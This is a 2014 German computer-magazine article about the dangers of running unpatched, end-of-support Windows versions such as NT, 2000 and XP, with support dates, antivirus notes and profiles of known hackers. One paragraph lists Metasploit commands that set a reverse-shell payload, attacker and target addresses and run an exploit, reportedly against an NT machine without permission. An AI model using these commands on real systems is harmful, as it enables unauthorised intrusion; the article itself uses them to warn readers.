Windows-Oldtimer

Nicht ins Netz mit alten Systemen!

09.08.2014 von Thomas Bär und Frank-Michael Schlede
Viele Nutzer fragen sich, warum sie auf die neueste Version einer Software oder gar eines Betriebssystems wechseln sollten, wenn die alte ihren Ansprüchen doch vollkommen genügt. Wir zeigen, dass von "Windows-Oldtimern" und alter Software auch Gefahren ausgehen.

Technikaffine Benutzer aus der Kategorie "Ich brauche immer das Neueste" betrachten ihre Windows-Systeme eher unter Aspekten wie:

Ein „ganz altes“ Windows-Betriebssystem (Windows ME): Für solche Systeme bietet Microsoft schon lang keine Updates mehr an. Wer auf „Windows Update“ klickt, landet im Internet Explorer in einer Endlosschleife.
Foto: Thomas Bär / Frank-Michael Schlede

Anwender, wie die Industrie sie sich sicher wünscht. In der Realität gibt es jedoch sehr viele Nutzer, die möglichst gar nichts verändern möchte. Es geht zumeist nicht (nur) um die Unlust, neue Funktionen kennenzulernen - es ist die Angst, dass nach einem Wechsel etwas nicht mehr so läuft wie bisher oder der Rechner gleich ganz aufgibt. Ganz im Sinne der Devise "Never change a running system." So vergeht Jahr um Jahr und die "alten Kisten" unter Windows 98, Windows 2000 oder Windows NT und vielleicht sogar Windows ME werden gehegt und gepflegt. Auch das zuverlässige "Arbeitspferd" Windows XP fällt so langsam in die Kategorie der Systeme, die mit der Begründung "läuft doch" ohne großes Nachdenken im täglichen Betrieb zum Einsatz kommen.

Das gilt auch für die direkten Verbindungen mit Netzwerken und dem Internet - hier ist jedoch der Punkt erreicht, wo es mit der Ruhe vorbei sein sollte. Alte Systeme, die weder regelmäßig gewartet noch mit Updates versehen werden, stellen eine akute Gefahr für die Sicherheit dar: Wir zeigen, warum es sträflich leichtsinnig ist, beispielsweise mit einem Windows-NT-System im Internet unterwegs zu sein.

Es ist aus: Der Support alter Windows-Versionen läuft aus.
Foto: Frank-Michael Schlede

Es ist vorbei: Windows XP läuft aus

Am 8. April 2014 endet auch der sogenannte "erweiterte Produktsupport" für die letzte Version von Windows XP mit Service Pack (SP3). Wer noch einen XP-Rechner verwendet und den Windows Update Dienst stets eingeschaltet hat, braucht sich um den Service-Pack-Stand deshalb nach wie vor keine Gedanken zu machen: Die Aktualisierung wird automatisch durchgeführt. Das ist auch der Grund, warum Anwender - bei aller Angst davor, dass ihr System "nach Hause telefoniert" und Microsoft angeblich zu viele Informationen über den XP-Rechner bekommt - auf keinen Fall die automatischen Updates abschalten sollten. Tun sie es doch, sollten sie wenigstens manuell sicherstellen, dass wichtige Updates und Patches auf ihr System gelangen. Wer auf Nummer sicher gehen möchte, kann durch einen Rechtsklick auf den Arbeitsplatz die "Eigenschaften" des Systems zur Ansicht bringen. Im obersten Informationsblock steht die Version, beispielsweise "Service Pack 3".

Sind Service Packs und Updates auch bei alten Rechnern wichtig?

In den Service Packs führt Microsoft eine große Anzahl von Korrekturen an seiner Software zusammen. Meist sind auch weitreichende sicherheitsrelevante Veränderungen integriert. Dazu gehörten schon bei SP2 für Windows XP:

Da der Gast-Account zugleich auch deaktiviert wurde, war das System in dieser Grundeinstellung deutlich sicherer gegenüber Fremdzugriffen.

Eine mit dem Service Pack 2 eingeführt Änderung erhöhte einst die Betriebssicherheit: Wer über das Netzwerk zugreift, hat in der Standardeinstellung nur noch Gast-Rechte.
Foto: Thomas Bär / Frank-Michael Schlede

Wichtig: Solche tiefgreifenden Änderungen zugunsten der Sicherheit gibt es für alte Betriebssysteme - und damit auch für Windows XP - nicht mehr. Hier lauert einer weitere Gefahr: Auch die Installations-Medien der Betriebssysteme werden üblicherweise mit dem aktuellen Service Pack ausgeliefert. Wer also mithilfe der Wiederherstellungs-CD einen alten Marken-PC wieder neu aufsetzt, arbeitet möglicherweise auf einem sehr alten Softwarestand. So haben wir testweise einen mittlerweile reichlich "verstaubten" Dell Dimension 4500 mit der Original-CD wieder aufgesetzt, der danach ein Windows XP auf dem Stand von SP1 besaß. Wer dann vielleicht aus Bequemlichkeit oder aus Angst vor Ausspähung die "Automatischen Updates" deaktiviert, begibt sich in sehr große Gefahr - die oben aufgeführten Sicherheitslücken erfüllen leicht die Kategorie "Scheunentore".

Tag 1: Installation und erster Eindruck
Am 29. Februar 2012 hat Microsoft die Consumer Preview von Windows 8 veröffentlicht. Unser Autor hat die Vorabversion auf seinem Notebook installiert und berichtet im Tagebuch über seine Erfahrungen.

Zum Artikel
Tag 2: Adios, Outlook
Nach der Installation ist vor der Nutzung: Am zweiten Tag kämpft unser Autor mit den neuen Apps für E-Mails, Termin- und Kontaktverwaltung. Und ärgert sich, dass Outlook zwar überflüssiger wird, Microsoft aber praktische Funktionen vergisst.

Zum Artikel
Tag 3: Ein Startmenü zum Umgewöhnen
Am dritten Tag unseres Tagebuchs zu Windows 8 beschäftigt sich unser Autor genauer mit dem neuen Startmenü - und erklärt, warum der Umstieg zwar gewöhnungsbedürftig aber nicht unbedingt unangenehm ist.

Zum Artikel
Tag 4: Windows 8 und die Hardware
Notebook-Hardware ist oft weniger exotisch als in Desktop-Systemen. Unser Autor prüft die Hardware-Unterstützung in Windows 8 und verzweifelt dabei fast an der UMTS-Unterstützung.

Zum Artikel
Tag 5: Software, Apps und der Windows Store
Ohne Programme macht Windows wenig Sinn. Unser Autor erklärt in seinem Windows-8-Tagebuch, ob der Windows Store bereits brauchbar ist und wo Probleme bei Softwareinstallation auftauchen.

Zum Artikel
Tag 6: Audio, Video und Netzwerkstreaming
Multimedia ist ein fester Bestandteil von Windows. Unser Autor überprüft, wie sich der jüngste Spross des Betriebssystems bei der Wiedergabe von Audio und Video schlägt und was die neuen Apps dabei leisten.

Zum Artikel
Tag 7: Eine Woche Windows 8
Unser Autor nutzt seit mehr als einer Woche die Vorschauversion von Windows 8 in der Praxis. Im heutigen Tagebucheintrag zieht er Zwischenbilanz.

Zum Artikel
Tag 8: Biometrischer Zugang statt Passwort
Sichere Passwörter sind lang und schwierig zu merken. Unser Autor bevorzugt daher biometrische Systeme und freut sich über neue - kaum beworbene - Funktionen in Windows 8.

Zum Artikel
Tag 9: Der neue Taskmanager
Nicht nur die Metro-Oberfläche ist neu, Microsoft verschafft auch dem Taskmanager einen neuen Anstrich und neue Funktionen. Aber ist das Tool damit auch besser

Zum Artikel
Tag 10: Windows 8 to Go
Windows 8 lässt sich erstmals offiziell auch von einem USB-Speicher starten. Unser Autor probiert die To-Go-Variante mit mehreren Festplatten aus und liefert eine Einschätzung des neuen Features.

Zum Artikel
Tag 11: Clevere Funktionen und neue Features
Neben den auffälligen Neuerungen bringt die Consumer Preview von Windows 8 auch viele kleinere Funktionen, die nicht weniger erwähnenswert sind. Unser Autor gibt einen Überblick.

Zum Artikel

Ein weiterer Angriffspunkt: Design-Unterschiede

Aus heutiger (Sicherheits-) Sicht wirken viele Standardeinstellungen von Windows XP förmlich "steinzeitlich": So besitzt der Benutzer eines XP-Computers in der Grundeinstellung üblicherweise Administrationsrechte und kann damit alle Parameter des Systems beliebig verändern. Folglich hat jedes Schadprogramm, das wissentlich oder eher unwissentlich vom Benutzer ausgeführt wird, diese hohen Zugriffsrechte ebenfalls.

Auf die Dauer eher hinderlich, als dass es mehr Sicherheit bringt: Das Ausschalten von gefährdeten Diensten kann hier nicht viel helfen.
Foto: Thomas Bär / Frank-Michael Schlede

In vielen Unternehmen wurden den Domänen-Benutzern zudem häufig lokale Administrationsrechte eingeräumt, da ansonsten einige Funktionalitäten im Zusammenspiel mit externer Hardware nicht einwandfrei arbeiteten. Beispielsweise war die anfängliche Synchronisation von Palm-Handhelds ohne Administrationsrechte eine Art "russisches Roulette" für die Outlook-Daten. Warum arbeiten aber auch heute die meisten XP-Systeme noch mit diesen hohen und damit riskanten Zugriffsrechten?

Dieser direkte Nachfolger - das eher unbeliebte Windows Vista - war zwar deutlich sicherer, aber dadurch auch beinahe "unbedienbar": Die selektive Zugriffssteuerung UAC (User Account Control - Benutzerkontensteuerung) mit dem sichertechnisch sehr guten Prinzip einer virtueller Registry zur Aufnahme von Programmstammdaten wurde erst mit Windows 7 wirklich einsetzbar. So verwundert es kaum, dass auch Windows Vista bereits in der "Rente des Supports" angelangt ist - auch wenn dieses System lange nicht so unsicher ist wie seine Vorgänger

Wissen und handeln: Wichtige Termine!!!

Trotzdem ist es wichtig zu wissen: Auch der Support für Windows Vista Service Pack 1 (SP1) endete bereits am 12. Juli 2011. Vista-Benutzer müssen, um weiterhin sicher arbeiten zu können, auf das Service Pack 2 (SP2) aktualisieren. Im April 2012 endete dann der so genannte "Mainstream Support" für Windows Vista SP2. Der Windows 7-Vorgänger befindet sich, wie Windows XP SP3, nun im erweiterten Produktsupport. In dieser Phase kümmert sich Hersteller Microsoft nur noch um "sicherheitsrelevante Aktualisierungen". Am 11.04.2017 endet dieser Support für Windows Vista endgültig, wie der Webseite "Product Lifecycle" von Microsoft entnommen werden kann.

Das Ende des Produkts (End Of Lifecycle) ist bei Microsoft kein Geheimnis – jeder kann es im Internet nachschlagen.
Foto: Thomas Bär / Frank-Michael Schlede

Der Support für Windows XP SP2 endete schon am 13. Juli 2010. Die Unterstützung für das letzten Service Pack 3 endet, wie bereits erwähnt, am 8. April 2014. Da es für die wenig verbreitete x64-Variante von Windows XP kein Service Pack 3 gibt, endet die erweiterte Produktunterstützung für SP2 ebenfalls im April 2014.

Nicht, dass der Eindruck entstünde, dass das Produkt ab diesem Tag nicht mehr funktionieren würde: Das jeweilige Windows läuft weiter - nur eben ohne Updates durch den Hersteller und mit dem entsprechenden Sicherheitsrisiko.

Soweit wird es Microsoft nicht kommen lassen, oder?

Stellt Microsoft im April 2014 den Support für Windows XP endgültig ein, so heißt dies nichts weniger, als dass für Sicherheitslücken, die ab diesem Zeitpunkt entdeckt werden, keine Korrekturen mehr vorgenommen werden. Öffnet ein klassischer "Buffer Overflow" beispielsweise einem Angreifer Tür und Tor auf dem Computer, kann der Benutzer nicht mehr auf Hilfe von Microsoft hoffen. Der XP-PC bleibt somit für immer ungeschützt, sofern nicht dieAnpassung einer Firewall-Regel oder die Deaktivierung der betreffenden Softwarekomponente eine Notlösung bieten.

Ein Beispiel aus der täglichen Praxis: Unter der kryptischen Bezeichnung "2387149 (MS10-074) - Sicherheitslücke in Microsoft Foundation Classes (MFC)" wurde im Sommer 2010 eine Sicherheitslücke in den Dateien mfc40u.dll beziehungsweise mfc42u.dll entdeckt. Diese wurde für alle "aktuellen" Windows-Versionen geschlossen, nicht jedoch für Windows 2000. Der Support für den XP/2003-Vorgänger endete bereits am 13.07.2010 und folglich gab es keine Korrektur gegenüber der Remote Code Execution-Problematik mehr.

Mythos 1
Mehr Sicherheit ist immer besser.
Mythos 2
Das DDoS-Problem ist mit Bandbreite zu lösen.
Mythos 3
Der Passwort-Ablaufzyklus (typischerweise 90 Tage) schützt die IT-Systeme.
Mythos 4
Auf die Intelligenz der Masse ist Verlass.
Mythos 5
Client-seitige Virtualisierung kann die Sicherheitsprobleme der IT-Consumerization lösen.
Mythos 6
Die IT sollte die Anwender dazu ermutigen, zufällig generierte Passwörter zu benutzen und diese alle 30 Tage zu ändern.
Mythos 7
Jeder Computervirus macht sich für den Anwender irgendwie bemerkbar.
Mythos 8
Wir sind kein Angriffsziel.
Mythos 9
Neue Software ist nicht sicherer als alte.
Mythos 10
Der Transfer von sensiblen Daten via SSL ist sicher.
Mythos 11
Endpoint-Security-Software ist Commodity geworden.
Mythos 12
Mit einer Firewall ist ein Netzwerk geschützt.

Schutz für alternde Windows-Rechner

Eine weitere, für viele Anwender äußerst wichtige Software, stammt ebenfalls aus dem Hause Microsoft und wird für Windows XP SP2 32-Bit und höher geliefert: Microsoft Security Essentials. Hierbei handelt es sich um eine einfache, kostenfreie Anti-Virus-Software für Privatanwender und kleine Unternehmen. War zunächst durch Äußerungen aus dem Hause Microsoft der Eindruck entstanden, dass man auch bei diesem Programm die Unterstützung für XP pünktlich im April 2014 einstellen werde, hat ein erst kürzlich veröffentlichter Eintrag im Blog des sogenannten "Malware Protection Center" dieses Einschätzung korrigiert: AV-Signaturen für diese Lösung werden von Microsoft noch bis zum 14. Juli 2015 ausgeliefert.

Microsoft Security Essentials
Microsoft Security Essentials ist eine kostenlose AV-Lösung von Microsoft.
Microsoft Security Essentials
Microsoft Security Essentials ist eine kostenlose AV-Lösung von Microsoft.
Microsoft Security Essentials
Microsoft Security Essentials ist eine kostenlose AV-Lösung von Microsoft.
Microsoft Security Essentials
Microsoft Security Essentials ist eine kostenlose AV-Lösung von Microsoft.
Microsoft Security Essentials
Microsoft Security Essentials ist eine kostenlose AV-Lösung von Microsoft.

Antivirus-Programme laufen zwar auch ohne die regelmäßigen Aktualisierungen der "Viren-Definitionsdatenbank" weiter, jedoch kann die Software auf neuere Bedrohungen nicht mehr reagieren. Viele Hersteller von Security-Lösungen wie beispielsweise Kaspersky oder AVG kündigen auch den Produkt-Support ihrer Programme relativ zeitnah zur Einstellung des Supports durch Microsoft ab.

Sophos fällt hier insgesamt positiv auf - der Hersteller liefert auch heute noch Antivirus-Lösungen für Windows 2000 Professional- und Server-Systeme SP3 und höher aus. Auch die auf diesen Systemen äußerst beliebte Antivirus-Lösung der deutschen Firma Avira wird noch eine Weile Updates für die AV-Signaturen anbieten. Auf der Web-Seite der Firma wird eine Unterstützung für alle Versionen von Windows XP bis zum 8. April 2015 angekündigt. Sicherheitssoftwarehersteller haben es jedoch extrem schwer, für ein alterndes und immer unsicher werdendes Betriebssystem eine entsprechend sichere Antivirensoftware zu liefern. Das Schutzprogramm kann sich einfach nicht mehr darauf verlassen, dass die darunterliegende Softwareschicht wirklich verlässliche Informationen zurückgibt.

G Data InternetSecurity 2012
G Data InternetSecurity 2012 gehört der diesjährigen neuen Genaration von Security-Suiten an. Noch immer bietet die Software Anti-Malware, Anti-Spam und eine Zwei-Wege-Firewall. In Version 2012 wurde das Outlook-Plugin überarbeitet, das für Spam- und Malware-Erkennung zuständig ist. Weiterhin liegt dem Paket eine Jahreslizenz für G Data MobileSecurity bei, mit der sich Android-Smartphones überwachen lassen.
Panda Internet Security 2012
Panda Security hat seine Security Suite konsequent weiterentwickelt. Die Version Panda Internet Security 2012 setzt noch stärker auf die Cloud als bisherige Versionen der Software. Da alle Nutzer gemeinsam Informationen über das Verhalten von potenzieller Schadsoftware sammeln und diese Informationen in der Cloud geteilt werden, soll ein noch besserer Schutz vor unbekannten Bedrohungen gewährleistet sein. Die integrierte Firewall bietet in der aktuellen Version eine verbesserte Überwachung von WLAN-Netzwerken. Eine virtuelle Tastatur macht das Eingeben von Login-Daten sicherer. Zudem gibt es die Option den Browser in einer Sandbox auszuführen, dadurch soll die Sicherheit beim Surfen steigen. Der Multimedia-Modus sorgt für eine geringe Systembeeinträchtigung beim Betrachten von Videos, Hören von Musik oder beim Spielen.
Avira Internet Security 2012
Avira Internet Security 2012 bietet Rundumschutz für das heimische System. Neben dem bekannten Antivirus-Modul, sind auch Tools gegen Phishing- und Spam-Attacken an Bord. Zusätzlich hilft Avira Internet Security 2012 bei der Datensicherung und besitzt überdies noch eine Kindersicherung. Mit dieser überwachen Sie die Internetaktivitäten des Nachwuchses. Sollten trotz FireWall, Drive-by-Download-Schutz und Echtzeit-Programm-Scanner doch einmal Schadcode auf den Rechner gelangen entfernen Sie diesen bequem und automatisch mit Hilfe der Generischen Reparatur. Für den schlimmsten Fall ist ein Rescue-System mitgeliefert, so retten Sie wenigstens Ihre Dokumente und Dateien. Dank weiter reduzierter Hardwareanforderungen soll Avira Internet Security 2012 auch problemlos auf Netbooks oder ähnlich schwachen Rechnern laufen.
Kaspersky Internet Security 2012
Mit der der Generation 2012 halten nun auch in der Kaspersky Internet Security Cloud-Funktionen Einzug. Das Kaspersky Security Network getaufte System lässt sich optional zuschalten und schickt Informationen über erkannte Bedrohungen, laufende Programme uvm. an Kaspersky Lab, wo die gesammelten Daten aller Programmteilnehmer ausgewertet werden. Auf diese Weise finden Warnungen zu etwaigen Schadprogrammen schneller den Weg zum Anwender, als es über normale Virensignatur-Updates der Fall wäre.
BitDefender Total Security 2011
Das Komplettpaket von BitDefender, Total Security 2011, soll vor allen gängigen Gefahren durch Malware, Hacker, Phising und Co. schützen, bietet jedoch auch zusätzliche Funktionen wie die Kindersicherung, Backup-Features und selbst eine Leistungsoptimierung an, die gängige Tune-up-Programme zu ersetzen vermag.
Symantec Endpoint Protection
Symantec Endpoint Protection soll eine umfangreiche Sicherheitslösung für Endgeräte sein. Die Security Suite kann sowohl auf virtuellen Systemen, als auch auf physischen genutzt werden. Die unterschiedlichen Schutzmechanismen werden in eine gemeinsame Verwaltungkonsole integriert um die Administration der Sicherheitssysteme zu erleichtern. Die Symantec Endpoint Protection umfasst Antiviren-Funktionalität, Anti-Spyware-Tools, eine Firewall, ein Intrusion Prevention System sowie eine Anwendungsverwaltung. Die Security Suite ist sowohl für Windows als auch für Mac Betriebsysteme verfügbar. Symantec verspricht Umsteigern eine nahtlose Migration auf das neue System. In der aktuellen Version ist besonders der Schutz der virtuellen Systeme verbessert worden. Die Hardwareanforderungen sind moderat. Ein 1,0 GHz-x86-Prozessor in Verbindung mit 512 MByte Arbeitsspeicher sind ausreichend. Intel Itanium CPUs oder PowerPC Geräte werden nicht unterstützt. Auf der Festplatte belegt Symantec Endpoint Protection 900 MByte Speicherplatz. Die Preise für die Security Suite sind sehr stark von Ihren Bedürfnissen abhängig, umfangreiche Informationen finden Sie auf der Symantec Webseite. Dort finden Sie auch eine Testversion zum Herunterladen. Auch Zugang zur Symantec Connect Online Community ist auf der Herstellerwebseite zu finden.
Kaspersky PURE
Kaspersky PURE offeriert dem Benutzer eine besonders breite Palette an Programmfunktionen, die über die gewöhnlichen Eigenschaften einer Security-Suite hinausgehen. Neben den normalen Sicherungsfunktionen wie Anti-Malware, einer Firewall und Web-Filtern bietet Kaspersky PURE eine Sicherungsfunktion zum Backup und der Wiederherstellung von Daten an. Weiterhin verschlüsselt das Programmpaket sensible Dokumente oder vernichtet unwiderruflich vertrauliche Daten. Mit dem integrierten Passwort-Manager sind Zugangsdaten sicher aufbewahrt.
Norton 360 5.0
Anti-Malware, Zwei-Wege-Firewall, PC-Tuning: Norton 360 5.0 verspricht dies alles. Doch die Werkzeuge, die der Software zur Verfügung stehen, sind damit noch nicht erschöpft. Weitere Funktionen sind Routinen zur automatischen Datensicherung und - wiederherstellung, ebenso wie ein zwei Gigabyte großer Online-Tresor für Persönliches. Auch um die E-Mail-Sicherheit kümmert sich Norton 360 5.0 und wickelt Malware-Nachrichten, Phishing-Mails und elektronischen Werbemüll ab. Abschießend sind noch die Kinder-Schutzfunktionen der Software zu erwähnen, die das Beaufsichtigen des Nachwuchses erleichtern.
Avira SmallBusiness Suite
Die Avira SmallBusiness Suite besteht im Grunde aus mehreren Avira-Produkten und richtet sich an kleine bis mittelgroße Unternehmen. Workstations auf Windows-Basis genießen mit Avira AntiVir Professional idealen Malware-Schutz, Dateiserver erhalten mit Avira AntiVir Server Schutz. Am E-Mail-Gateway setzen die beiden Avira-Produkte AntiVir Exchange und AntiSpam an. Die Verwaltung der gesamten Software geschieht über das Avira Security Management Center. Während der gesamten Vertragslaufzeit sind alle Updates und Upgrades inkludiert.
F-Secure Business Suite
F-Secure will IT-Sicherheit zu einer einfachen Angelegenheit für Unternehmen machen, weshalb eine Reihe bekannter F-Secure-Produkte in der Business Suite gebündelt werden. Enthalten ist Schutz-Software für Windows- und Linux-Workstations, ebenso wie für Windows- und virtualisierte Citrix-Server. Exchange Server werden des Weiteren mit einem eigenen Software-Paket bedacht. Für Firmen mindestens ebenso wichtig: Die Verwaltung. F-Secure Policy Manager heißt die Software die alle F-Secure-Produkte administriert.

Irrglauben: "Hacking ist kompliziert, da passiert schon nichts!"

Das "Hacking", das unerlaubte und möglichst unbemerkte Eindringen auf einen PC oder in eine Netzwerkstruktur, gilt gemeinhin als "hohe Kunst" in der IT. Hohes technisches Wissen, gepaart mit krimineller Energie, wird den Personen nachgesagt, die sich dem Hacking verschreiben haben.

Wir haben uns einmal selbst daran versucht, ein altes, aber noch produktives Windows NT-System, ohne die passende Erlaubnis und ohne das Wissen der Administrationsberechtigung, über das Netzwerk übernehmen zu wollen. Die Standard-Applikationen für derlei "Penetration Testings" sind Metasploit und Nexpose von Rapid7. Für das Herunterladen, das Aufsetzen der virtuellen Maschine mit Windows Server 2003 Betriebssystem und den ersten Einblick der Software benötigten wir zirka vier Stunden.

Eine Attacke auf ein altes Windows-System ist viel einfacher, als so mancher denkt: Gerade einmal vier Stunden inklusive Vorbereitungs- und Installationszeit benötigten die Autoren für einen erfolgreichen Hack.
Foto: Thomas Bär / Frank-Michael Schlede

Erschreckend einfach: Welche Sicherheitslücken die Software auf einem Zielrechner als "wahrscheinlich" einstuft, gibt Nexpose freizügig aus. In der Konsole von Metasploit mussten wir anschließend lediglich vier Eingaben vornehmen, ehe wir direkt in der Eingabeaufforderung des NT-Rechners landeten. Mit "set PAYLOAD generic/shell_reverse_tcp" wird die gewünschte "Sicherheitslücke" anvisiert, mit "set LHOST 10.117.21.123" definierten wir unsere Maschine als ausführenden Angreifer und mit "set RHOST 10.117.18.104" das Ziel. Das Kommando "exploit" führt den gewünschten Befehl aus und keine zehn Sekunden später konnten wir alle administrativen Befehle auf dem Zielrechner ausführen!

Der Vater des Blackholing
Der auch als „Paunch“ bekannte Dmitry Fedotov ist weniger als Hacker, denn als Entwickler des Hacker-Tools Blackhole berühmt. Bei Blackhole handelt es sich um eine Art Webanwendung für die Verbreitung von Malware- und Spyware, die Hacker gegen eine Abo-Gebühr von 1500 US-Dollar pro Jahre mieten können - und bis zur Festnahme laufend mit Updates über neue Schwachstellen von Java, Flash oder des Internet Explorer aktualisiert wurde. Der im Oktober 2012 von den russischen Behörden verhaftete Programmierer aus Togliatti soll auch Autor des Cool Exploit-Kits und von Crypt.AM sein.
Der Herrscher der Kreditkarten
Der Juni 2012 in den Niederlanden zusammen mit Vladimir Drinkman verhaftete russische Hacker soll laut Anklageschrift von August 2005 bis Juli 2012 als Mitglied einer Gruppe von fünf Cyberkriminellen im Laufe der Jahre riesige Mengen an Kreditkartendaten gestohlen haben. Zusammen mit Aleksandr Kalinin, Roman Kotov, Mikhail Rytikov und Vladimir Drinkman soll Smilianets vor allem durch SQL Injection Hacks Firmen wie Nasdaq, 7-Eleven Carrefour und J.C. Penny gehackt haben. Insgesamt 160 Millionen Kreditkarten- und Guthabendaten wurden gestohlen und für Finanzbetrug benutzt. Der Schaden für die Firmen soll bei 300 Millionen US-Dollar liegen. Der Prozess in den USA ist noch nicht abgeschlossen.
FBI's most wanted
Evgniy Mikhailovich Bogachev, auch bekannt als lucky12345 und slavik schaffte es 2014 auf den ersten Platz der so genannte „Cyber Most Wanted“-Liste des FBI. Die amerikanischen Behören sehen in ihm den Hintermann des Botnetzes „Gameover Zeus“. Mit Hilfe der gleichnamigen Malware soll er für ein Botnetz von bis zu einer Million Computern verantwortlich sein, das zum Ausspähen von Bank-Passwörtern und Verbreiten von Malware benutzt wurde. Der Schaden betrage etwa hundert Millionen US-Dollar betragen. Bogachev hält sich nach Vermutungen der amerikanischen Behörden in Russland auf.
Der Phishing-Experte
Der Lette Alexey Belan soll zwischen Januar 2012 und April 2013 die Nutzerdaten von einigen Millionen Kunden dreier US-Unternehmen gestohlen haben. Er ist auf der Liste der meistgesuchten Hacker des FBI, der Name der geschädigten Unternehmen ist aber ebenso wenig bekannt, wie die Höhe des Schadens. Es soll sich um drei nicht genannte E-Commerce-Unternehmen aus Nevada und Kalifornien handeln. Da die Belohnung 100.000 US-Dollar beträgt, sollte der Schaden beträchtlich sein.

Das hätte genauso gut ein Windows 2000 oder XP-Computer mit fehlenden Patches sein können, wie das Internet-Video "Shell Root" auf YouTube eindrucksvoll zeigt. Uns geht es bei diesem Hinweis natürlich nicht darum, dem strafrechtlich relevanten "Hacking" Vorschub zu leisten; eher möchten wir Sie als Leser auf diese "reale Gefahr" hinweisen und zeigen, wie leicht es ist, ein solches System zu kompromittieren.

Nicht vernachlässigen: Applikationen auf dem Stand halten

Ohne Frage ist das Betriebssystem bezüglich der Betriebssicherheit die wichtigste und erste Adresse. Die auf dem Betriebssystem ausgeführten Programme dürfen jedoch in der Gesamtbetrachtung auf keinen Fall vernachlässigt werden. Auch wenn das Windows XP an sich auf dem neuesten Stand gehalten wird, so kann die Verwendung des Internet Explorers 6, eines restlos veralteten Firefox 3.5 oder eines ebenfalls "ergrauten" Adobe Acrobat 7 für Schadprogramme das sprichwörtlich "gefundene Fressen" sein. Beinahe jede Software animiert den Benutzer regelmäßig dazu, Aktualisierungen einzuspielen, doch das hilft wenig, wenn dieser stets auf "Nein" klickt.

Besonders veraltete Browser, hier der Internet Explorer 6 von Microsoft, stellen ein hohes Sicherheitsrisiko für den PC dar.
Foto: Thomas Bär / Frank-Michael Schlede

Aussagen zu der weiteren "Pflege“ solcher Altlasten sind von den Hersteller allerdings nur schwer zu bekommen. Google hat dieses Problem auf jedem Fall erkannt und weist im eigenen Blog darauf hin, dass gerade von ungepatchten Browser-Fehlern große Gefahren ausgehen: Sehr viele Angriffe auf IT-Infrastrukturen nutzen heute den Browser, der in den meisten Firma schon die Standardschnittstelle der Nutzer für viele Arbeiten darstellt, als Einfallstor für Schadsoftware. Deshalb kündigt Google in diesem Blog-Eintrag auch an, dass es bis April 2015 weiterhin regelmäßig Updates und Sicherheits-Patches für Google Chrome geben werde. Diese Updates werden weiterhin automatisch durch den Google-Browser installiert – wenn die Nutzer diese Funktion nicht abgeschaltet haben.

Veraltete Software, hier exemplarisch der Adobe Reader 7, ist ebenfalls ein Sicherheitsrisiko. Adobe stellt Updates nur für einen deutlich kürzeren Zeitraum als Microsoft bereit.
Foto: Thomas Bär / Frank-Michael Schlede

An diesem Verhalten des unbedarften Benutzers ist die IT-Branche jedoch selbst schuld. Wie oft hat die IT-Presse darüber berichtet, dass es ein Fehler war, auf "Ja" zu klicken? Wer einst beim "Loveletter" auf "Nein" klickte, der hatte kein Problem. Erst in der jüngeren Vergangenheit sind die Entwickler, beispielsweise von Googles Chrome, dazu übergegangen, die Updates immer und automatisch einzuspielen. Die Wahrscheinlichkeit, dass etwas nicht mehr ordentlich funktioniert, ist weitaus geringer, als die entstehenden Sicherheitsrisiken.

Andererseits trifft die Produkt-Manager und Marktstrategen eine nicht zu unterschätzende Mitschuld: Die ständige Erhöhung des Versionszählers sollte nicht darüber hinwegtäuschen, dass neue Features scheinbar höher in der Bedeutung sind, als die Erstellung von möglichst fehlerfreier Software.

Und immer noch ganz oben

Die Annahme, dass Windows XP schon vollkommen "out" ist und sich eigentlich kaum noch jemand dafür begeistern dürfte, ist leider ein Trugschluss. Trotz des überaus beeindruckenden Verkaufserfolgs von Windows 7 gelang es dem deutlich jüngeren Betriebssystem laut Wikipedia erst im Oktober 2011, das alte XP in Marktanteilen zu übertrumpfen. Man darf nicht vergessen, dass Netbooks auch im Jahr 2010 noch mit XP ausgeliefert wurden und dass in vielen Windows-7-Computern ein altes XP im "XP Mode" schlummert. Die neuesten Zahlen der amerikanischen Seite Netmarketshare zeigen, dass Windows 7 im Januar 2014 zwar den weltweiten Markt der Desktop-Betriebssystem zu fast 48 Prozent beherrscht, aber Windows XP mit einem immer noch beachtlichen Anteil von 29 Prozent Konkurrenten wie Mac OS X oder gar Windows 8 auf die Plätze verweist.

Die aktuellen Zahlen von Netmarketshare für Januar 2014 zeigen, dass ältere Windows-Versionen wie XP nach wie vor einen beträchtlichen Marktanteil besitzen.
Foto: Data provided by > Net Applications - www.netapplications.com

Für all diese Geräte, seien sie nun physikalisch oder virtuell, gilt der 8.April 2014 als der letzte sichere Arbeitstag - und damit als der späteste Zeitpunkt für einen Wechsel. Zumindest sofern sich Microsoft nicht noch einmal gnädig zeigt - dies ist, nach immerhin 4548 Tagen Support, jedoch eher unwahrscheinlich. Kaum ein Hersteller bietet fast zwölfeinhalb Jahre Unterstützung für eines seiner Produkte an - ein Blick auf die Apple-Betriebssysteme zeigt da beispielsweise ein ganz anderes Bild. (sh)